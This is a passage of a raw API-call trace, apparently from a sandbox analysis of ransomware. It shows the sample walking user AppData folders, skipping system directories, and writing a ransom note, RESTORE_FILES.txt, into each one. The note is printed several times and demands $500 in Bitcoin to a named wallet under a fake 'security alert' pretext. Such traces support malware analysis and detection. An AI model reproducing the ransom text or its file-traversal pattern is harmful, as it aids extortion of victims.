wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RESTORE_FILES.txt") returned 109 [0085.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.074] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.074] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0085.074] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.074] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0085.075] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.075] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0085.075] CloseHandle (hObject=0x150) returned 1 [0085.075] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.075] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.075] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RESTORE_FILES.txt") returned 103 [0085.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.075] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.075] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.076] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.076] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.076] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.076] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.076] CloseHandle (hObject=0x14c) returned 1 [0085.078] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.078] lstrcmpiW (lpString1="Transcoded Files Cache", lpString2="Windows") returned -1 [0085.078] lstrcmpiW (lpString1="Transcoded Files Cache", lpString2="Program Files") returned 1 [0085.078] lstrcmpiW (lpString1="Transcoded Files Cache", lpString2="Program Files (x86)") returned 1 [0085.078] lstrcmpiW (lpString1="Transcoded Files Cache", lpString2="$Recycle.bin") returned 1 [0085.078] lstrcmpiW (lpString1="Transcoded Files Cache", lpString2="System Volume Information") returned 1 [0085.078] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache") returned 93 [0085.078] lstrcmpW (lpString1="Transcoded Files Cache", lpString2=".") returned 1 [0085.078] lstrcmpW (lpString1="Transcoded Files Cache", lpString2="..") returned 1 [0085.078] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*") returned 95 [0085.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.079] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.079] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.079] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.079] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.079] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.079] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\.") returned 95 [0085.079] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.079] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.079] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.079] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.079] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.079] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.079] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.079] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\..") returned 96 [0085.079] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.079] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.080] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.080] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.080] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\RESTORE_FILES.txt") returned 111 [0085.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\transcoded files cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.080] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.080] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.081] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.081] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.081] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.081] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.081] CloseHandle (hObject=0x14c) returned 1 [0085.081] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.081] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.081] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\RESTORE_FILES.txt") returned 88 [0085.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.082] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.082] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.083] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.083] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.083] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.083] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.083] CloseHandle (hObject=0xd8) returned 1 [0085.083] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.083] lstrcmpiW (lpString1="Office", lpString2="Windows") returned -1 [0085.083] lstrcmpiW (lpString1="Office", lpString2="Program Files") returned -1 [0085.083] lstrcmpiW (lpString1="Office", lpString2="Program Files (x86)") returned -1 [0085.083] lstrcmpiW (lpString1="Office", lpString2="$Recycle.bin") returned 1 [0085.083] lstrcmpiW (lpString1="Office", lpString2="System Volume Information") returned -1 [0085.083] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office") returned 64 [0085.083] lstrcmpW (lpString1="Office", lpString2=".") returned 1 [0085.083] lstrcmpW (lpString1="Office", lpString2="..") returned 1 [0085.083] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\*") returned 66 [0085.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.084] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.084] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.084] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.084] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.084] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.084] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\.") returned 66 [0085.084] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.084] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.084] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.084] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.084] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.084] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.084] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.084] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\..") returned 67 [0085.084] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.084] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.084] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.084] lstrcmpiW (lpString1="14.0", lpString2="Windows") returned -1 [0085.084] lstrcmpiW (lpString1="14.0", lpString2="Program Files") returned -1 [0085.084] lstrcmpiW (lpString1="14.0", lpString2="Program Files (x86)") returned -1 [0085.084] lstrcmpiW (lpString1="14.0", lpString2="$Recycle.bin") returned 1 [0085.084] lstrcmpiW (lpString1="14.0", lpString2="System Volume Information") returned -1 [0085.084] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0") returned 69 [0085.084] lstrcmpW (lpString1="14.0", lpString2=".") returned 1 [0085.084] lstrcmpW (lpString1="14.0", lpString2="..") returned 1 [0085.084] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\*") returned 71 [0085.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.085] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.085] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.085] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.085] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.085] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.085] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\.") returned 71 [0085.085] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.085] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.086] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.086] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.086] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.086] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.086] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.086] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\..") returned 72 [0085.086] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.086] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.086] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.086] lstrcmpiW (lpString1="OfficeFileCache", lpString2="Windows") returned -1 [0085.086] lstrcmpiW (lpString1="OfficeFileCache", lpString2="Program Files") returned -1 [0085.086] lstrcmpiW (lpString1="OfficeFileCache", lpString2="Program Files (x86)") returned -1 [0085.086] lstrcmpiW (lpString1="OfficeFileCache", lpString2="$Recycle.bin") returned 1 [0085.086] lstrcmpiW (lpString1="OfficeFileCache", lpString2="System Volume Information") returned -1 [0085.086] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache") returned 85 [0085.086] lstrcmpW (lpString1="OfficeFileCache", lpString2=".") returned 1 [0085.086] lstrcmpW (lpString1="OfficeFileCache", lpString2="..") returned 1 [0085.087] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\*") returned 87 [0085.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0085.088] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.088] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.088] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.088] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.088] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned 